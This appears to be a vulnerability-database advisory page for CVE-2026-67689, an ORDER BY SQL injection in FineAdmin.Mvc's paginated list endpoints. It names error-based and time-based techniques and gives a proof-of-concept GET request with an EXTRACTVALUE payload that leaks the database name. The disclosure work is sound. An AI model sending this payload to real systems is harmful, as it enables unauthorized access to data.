Lucene search
+L

📄 FineAdmin.Mvc SQL Injection

🗓️ 05 Aug 2026 00:00:00Reported by zyhType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 28 Views

CVE-2026-67689: FineAdmin.Mvc SQL injection in ORDER BY for list endpoints via unsanitized field and order.

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-67689
6 Aug 202600:00
attackerkb
circl
Circl
CVE-2026-67689
7 Aug 202615:52
circl
cve
CVE
CVE-2026-67689
6 Aug 202600:00
cve
cvelist
Cvelist
CVE-2026-67689
6 Aug 202600:00
cvelist
euvd
EUVD
EUVD-2026-54308
7 Aug 202600:31
euvd
kitploit
Kitploit
CVE-2026-67689-FineAdmin.Mvc-vulnerability
26 Aug 202602:15
kitploit
nvd
NVD
CVE-2026-67689
6 Aug 202622:18
nvd
vulnrichment
Vulnrichment
CVE-2026-67689
6 Aug 202600:00
vulnrichment
CVE-2026-67689: FineAdmin.Mvc ORDER BY Clause SQL Injection
    CVE ID
    CVE-2026-67689
    
    Description
    FineAdmin.Mvc is vulnerable to SQL injection via the field and order parameters in paginated list endpoints. The BaseService.GetListByFilter() and GetPageUnite() methods directly concatenate pageInfo.field and pageInfo.order into the ORDER BY clause via string.Format() with no whitelist validation or sanitization.
    
    In MySQL, ORDER BY supports expressions, subqueries, and function calls, enabling EXTRACTVALUE()/UPDATEXML() error-based injection and SLEEP() time-based blind injection.
    
    Proof of Concept (PoC)
    Error-based injection — extract database name:
    
    GET /Permissions/User/List?page=1&limit=10&field=EXTRACTVALUE(1%2CCONCAT(0x7e%2CDATABASE()%2C0x7e))&order=desc HTTP/1.1
    Cookie: Loginkey=<SESSION>
    Expected response:
    
    {"state":"error","message":"XPATH syntax error: '~fineadmin~'"}
    
    
    Impact
    Broader attack surface — 5+ endpoints affected
    ORDER BY injection in MySQL offers more exploitation vectors than string-based injection
    Credit
    Discoverer: zyh

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.8
EPSS0.00685
SSVC
28